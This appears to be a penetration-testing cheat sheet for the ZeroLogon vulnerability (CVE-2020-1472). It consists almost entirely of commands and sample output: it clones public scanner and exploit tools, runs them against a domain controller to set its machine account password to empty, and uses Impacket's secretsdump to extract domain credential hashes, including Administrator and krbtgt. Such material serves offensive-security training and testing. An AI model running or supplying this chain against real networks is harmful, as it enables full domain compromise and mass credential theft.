CVE

CVE-2020-1472 - ZeroLogon

Scanner

git clone https://github.com/SecuraBV/CVE-2020-1472.git
pip install -r requirements.txt

Usage

$ python3 zerologon_tester.py DC2016 10.10.10.10
Performing authentication attempts...
=============================================================================
Success! DC can be fully compromised by a Zerologon attack.

Tip: for finding the computer name, use: rdesktop -u ’’ IP

Exploit

git clone https://github.com/dirkjanm/CVE-2020-1472.git
$ python3 cve-2020-1472-exploit.py DC2016 10.10.10.10
Performing authentication attempts...
=========================================================
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!

Dump using ’no-pass’ flag and computer account

$ secretsdump.py DC2016\[email protected] -no-pass -just-dc
Impacket v0.9.22.dev1+20200914.162022.81d44893 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:102277341d6c113a28017200e1dfafe9:::
offsec.nl\johndo:1107:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
offsec.nl\adm_johndo:1108:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
offsec.nl\janedo:1110:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
offsec.nl\tokio:1111:aad3b435b51404eeaad3b435b51404ee:b5165f7ba9b2b1a41245a1e91c48b3a9:::
[...]
[*] Cleaning up...

Or dump with empty hash

$ secretsdump.py DC2016\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
Impacket v0.9.22.dev1+20200914.162022.81d44893 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:102277341d6c113a28017200e1dfafe9:::
offsec.nl\johndo:1107:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
offsec.nl\adm_johndo:1108:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
offsec.nl\janedo:1110:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
offsec.nl\tokio:1111:aad3b435b51404eeaad3b435b51404ee:b5165f7ba9b2b1a41245a1e91c48b3a9:::
[..SNIP...]
[*] Cleaning up...

URL list